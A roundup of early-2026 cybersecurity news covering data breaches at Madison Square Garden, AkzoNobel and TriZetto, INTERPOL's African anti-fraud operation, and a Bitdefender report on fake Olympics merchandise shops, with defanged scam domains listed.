“Passwords were stored as PBKDF2 hashes, and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry, and masked card number),” Have I Been Pwned notes.

Canadian Tire has notified the affected individuals via email but has yet to publicly confirm the number of victims.

securityweek.com
ByEduard Kovacs| March 2, 2026 (8:53 AM ET)

The company is one of the many victims of the 2025 Oracle E-Business Suite (EBS) hacking campaign.

Madison Square Garden has confirmed being impacted by a data breach stemming from a cybercrime campaign targeting customers of Oracle’s E-Business Suite (EBS) solution.

In the Oracle EBS hacking campaign, the Cl0p ransomware and extortion group exploited zero-day vulnerabilities to gain access to data stored by more than 100 organizations in the enterprise management software.

Madison Square Garden (MSG), the world-famous arena located in New York City, was named by the hackers as a victim of the campaign in November 2025.

Data allegedly stolen from the company — more than 210GB of archive files — was leaked by the cybercriminals soon after, indicating that it had refused to pay a ransom.

MSG did not respond to repeated requests for comment at the time. However, it has now confirmed suffering a data breach and it has started notifying individuals whose personal information was compromised as a result of the cybersecurity incident.

According to notifications from MSG Entertainment, the impacted Oracle EBS instance is hosted and managed by a third-party vendor, whose investigation found that hackers stole data in August 2025.

The entertainment company said personal information, including names and SSNs, was compromised.

It’s unclear how many people are affected in total, but MSG Entertainment told the Maine Attorney General’s Office that 11 of the state’s residents are impacted.

bleepingcomputer.com
By Bill Toulas
March 3, 2026

The multinational Dutch paint company AkzoNobel has confirmed to BleepingComputer that hackers breached the network of one of its U.S. sites.

Following a data leak from the Anubis ransomware gang, a company spokesperson said that the intrusion has been contained and that the impact is limited.

“AkzoNobel has identified a security incident at one of our sites in the United States. The incident was limited to the respective site and was already contained,” the company told BleepingComputer.

“The impact is limited, and we are taking the appropriate steps to notify and support impacted parties, and will work closely with relevant authorities.”

AkzoNobel is a major paints and coatings company with 35,000 employees. It has an annual revenue exceeding $12 billion and active operations in over 150 countries. Brands under its corporate umbrella include Dulux, Sikkens, International, and Interpon.

Anubis ransomware claims to have stolen from AkzoNobel 170GB of data, almost 170,000 files, and leaked on its leak site samples that include screenshots of select documents and a list of the stolen files.

The published data contains confidential agreements with high-profile clients, email addresses and phone numbers, private email correspondence, passport scans, material testing documents, and internal technical specification sheets.

At the time of writing, the Anubis leak is only partial. AkzoNobel did not share with BleepingComputer any information on whether it engaged with the threat actor.

Anubis is a ransomware-as-a-service (RaaS) operation that launched in December 2024, offering affiliates 80% of the paid ransoms.

In February 2025, the operators launched an affiliate program on the RAMP forum, boosting its activity and influence in the cybercrime space.

In June the same year, Anubis added to its arsenal a data wiper that destroys the victim’s files to make recovery impossible.

| TechCrunch techcrunch.com
Zack Whittaker
6:28 AM PST · March 6, 2026

Health tech giant TriZetto has confirmed that more than 3.4 million people had personal and health information stolen in a 2024 cyberattack, which the company failed to detect for almost a year.

The tech company, owned by multinational conglomerate Cognizant, serves around 200 million people across 875,000 healthcare providers throughout the U.S., according to its website. Doctors’ offices and healthcare providers use TriZetto to assess patients’ insurance for medical treatments.

TriZetto said in a filing with Maine’s attorney general on Friday that hackers stole patients’ insurance eligibility transaction reports from the company’s servers.

The data includes personal information like patients’ names, dates of birth, home addresses, and Social Security numbers, as well as information about their healthcare, such as their provider’s name, demographic data, and health and insurance details.

TriZetto said it identified the breach on October 2, 2025, but later discovered that the hackers had access as far back as November 2024.

Cognizant spokesperson William Abelson said the company “eliminated the threat” to its environment, but would not say why it took the company a year to detect the breach.

Several organizations have confirmed that their patients’ information was compromised in the cyberattack. One of these is OCHIN, a nonprofit consultancy firm that provides healthcare technology to some 300 rural and community care providers across the United States. Other healthcare providers across California have also confirmed.

According to TriZetto, not every customer was affected by the breach.

TriZetto is the latest major health tech company to confirm a hack in recent years.

In 2024, a ransomware attack at Change Healthcare, another health tech giant that processes some 15 billion healthcare transactions, allowed hackers to make off with more than 192 million patient files. The cyberattack sparked outages across the U.S., leaving many without access to medical treatments or medications.

Updated with comment from Cognizant.

www.interpol.int
18 February 2026

Cyber operation dismantles criminal networks running transnational fraud schemes

LYON, France – Law enforcement agencies from 16 African countries have made 651 arrests and recovered more than USD 4.3 million in an international cybercrime operation against online scams.

Operation Red Card 2.0 (8 December 2025 to 30 January 2026) targeted the infrastructure and actors behind high-yield investment scams, mobile money fraud and fraudulent mobile loan applications.

During the eight-week operation, investigations exposed scams linked to over USD 45 million in financial losses and identified 1,247 victims, predominantly from the African continent but also from other regions of the world. Authorities also seized 2,341 devices and took down 1,442 malicious IPs, domains and servers, as well as other related infrastructure.

INTERPOL supported the operation through critical intelligence sharing, real-time information exchange and capacity-building activities, including training on digital forensic tools.

Neal Jetton, INTERPOL’s Director of the Cybercrime Directorate, said:

“These organized cybercriminal syndicates inflict devastating financial and psychological harm on individuals, businesses and entire communities with their false promises. Operation Red Card highlights the importance of collaboration when combatting transnational cybercrime. I encourage all victims of cybercrime to reach out to law enforcement for help.”

The architecture of fraud: Key cases reveal diverse scam models

In Nigeria, police dismantled a high-yield investment fraud ring that recruited young individuals to carry out cyber-enabled crimes using phishing, identity theft, social engineering and fake digital asset investment schemes. Over 1,000 fraudulent social media accounts were taken down and investigators uncovered a residential property constructed by the syndicate ringleader to serve as the operational hub for the criminal activities.
In Kenya, authorities made 27 arrests linked to fraud schemes that used messaging apps, social media and fictitious testimonials to lure victims into making fake investments in reputable global corporations. Scammers solicited small initial investments ‒ as low as USD 50 ‒ with claims of lucrative returns. Victims were shown fabricated account statements or dashboards but withdrawal requests were systematically blocked.
In Côte d’Ivoire, law enforcement made 58 arrests and seized 240 mobile phones, 25 laptops and over 300 SIM cards in a targeted operation against mobile loan fraud. These scams predominantly targeted vulnerable populations through deceptive mobile applications and messaging services, attracting victims with promises of quick, unsecured loans, only to impose fees, enforce abusive debt-collection practices and illicitly harvest sensitive personal and financial data.
In a separate major success for Nigerian authorities, six members of a sophisticated cybercrime syndicate were arrested for infiltrating the internal platform of a major telecommunications provider through compromised staff login credentials. An investigation led to the disruption of the scheme, which involved siphoning significant volumes of airtime and data for illegal resale.
During Operation Red Card 2.0, INTERPOL worked closely with its partners, Cybercrime Atlas, Team Cymru, Trend Micro, TRM Labs and Uppsala Security, leveraging their data and expertise to provide critical intelligence to participating countries.

Notes to editors

The operation was conducted under the African Joint Operation against Cybercrime (AFJOC), an initiative funded by the UK’s Foreign, Commonwealth & Development Office.

The Global Action on Cybercrime Enhanced (GLACY-e) project, a joint initiative of the European Union and the Council of Europe, provided operation-specific support.

Participating member countries

Angola, Benin, Cameroon, Côte d’Ivoire, Chad, Gabon, Gambia, Ghana, Kenya, Namibia, Nigeria, Rwanda, Senegal, Uganda, Zambia and Zimbabwe.

bitdefender.com
Alina BÎZGĂ
February 17, 2026

Bitdefender Labs is tracking an ongoing scam campaign on Meta platforms targeting people in the EU and the US, using fraudulent “Olympics Shop” advertisements that offer discounts of up to 80% on Milano Cortina 2026 merchandise.

Bitdefender Labs is tracking an ongoing scam campaign on Meta platforms targeting people in the EU and the US, using fraudulent “Olympics Shop” advertisements that offer discounts of up to 80% on Milano Cortina 2026 merchandise.

Users who click on these ads and interact with the fraudulent websites expose themselves to several risks. Many similar scam operations are designed to steal payment card information at checkout, harvest personal details such as names, addresses, phone numbers, and email accounts, and in some cases collect login credentials.

Victims may also receive counterfeit merchandise — or nothing at all — after completing a purchase. In many instances, the sites disappear shortly after processing payments, leaving buyers with no way to recover their money.

At a glance, the ads look legitimate.

They feature official Olympic imagery, professional product photos, and convincing promotional messages such as:

“Olympics Exclusive! Up to 80% OFF.
30 Days No Excuse Free Return.
🛒Get Yours Before Out of Stock!”

“Olympics Esclusivo! Sconti fino all'80%.”
“Reso gratuito entro 30 giorni, senza domande.”
“Acquistalo prima che finisca!”

But the danger begins after the click.

Near-Perfect Clones of the Official Olympics Shop

The fraudulent websites are not crude copies – they are near-perfect replicas of the official Olympics merchandise store.

Bitdefender Labs observed that the scam sites use:

The same product photos
Identical color schemes
The same merchandise collections
Official branding elements
Similar layout structure
At a glance, most users would struggle to tell the difference.

The deception lies in the small details.

For example:

The legitimate store promotes “Sign up & Save 15%.”
The scam websites advertise “Sign & Save 80%.”
Official Olympics Shop

Fake Olympics Shop

That small wording change reflects the core tactic: inflate discounts to trigger a sense of urgency and bypass skepticism.

Font rendering may be slightly different. Minor layout inconsistencies appear in certain sections. Domain names look similar but are newly registered and unrelated to the official organization.

These subtle discrepancies are easy to miss when a user is focused on a limited-time deal.

Coordinated Scam Infrastructure

This campaign shows clear signs of coordination, and as Labs researcher Andreea Olariu points out, most of the fraudulent domains were registered within days of each other:

www.olympics2026[.]store – created Feb 3
Olympicseu[.]shop – created Feb 9
olympics-sale[.]top – created Feb 9
olympics-hot[.]top – created Feb 9
www.olympics-top[.]shop –created Feb 10
Olympicssportswear[.]shop – created Feb 10
Olympexapparel[.]shop – created Feb 10
Lifestylecollection[.]shop – created Feb 10
www.2026olympics[.]store – created Feb 11
Following the initial detection of the scam advertisements, Olariu observed ongoing domain registrations consistent with the same impersonation strategy. The daily appearance of new lookalike domains indicates an adaptive infrastructure designed to evade detection and extend the campaign’s lifespan.

Most recent domains include:

Olymponline[.]top – created Feb 11
Postolympicsale[.]com created Feb 11
sale-olympics[.]top - created Feb 11
olympics-save[.]top - created Feb 11
olympicssportswears[.]shop - created Feb 11
olympicsfashionhub.[]shop - created Feb 12
All these domains are flagged as fraudulent by Bitdefender security systems.

In some instances, ads appear to display the official shop preview but silently redirect users to www.olympics2026[.]store for example.

Newly Created Facebook Pages Running the Ads
Another strong indicator of fraud: the Facebook pages promoting these ads are newly created.

Bitdefender Labs observed that several of these pages were set up on the same day the scam domains were registered. This suggests a rapid deployment model:

Register domain
Clone official website
Create Facebook page
Launch ad campaign
Begin collecting payments
All within a short time window.

Legitimate global brands rarely create brand-new pages and immediately launch aggressive 80% discount campaigns tied to major international events.

The sophistication of the cloning significantly increases the risk. When scam sites mirror official branding almost perfectly, users default to visual familiarity instead of domain verification.

That’s exactly what attackers are counting on.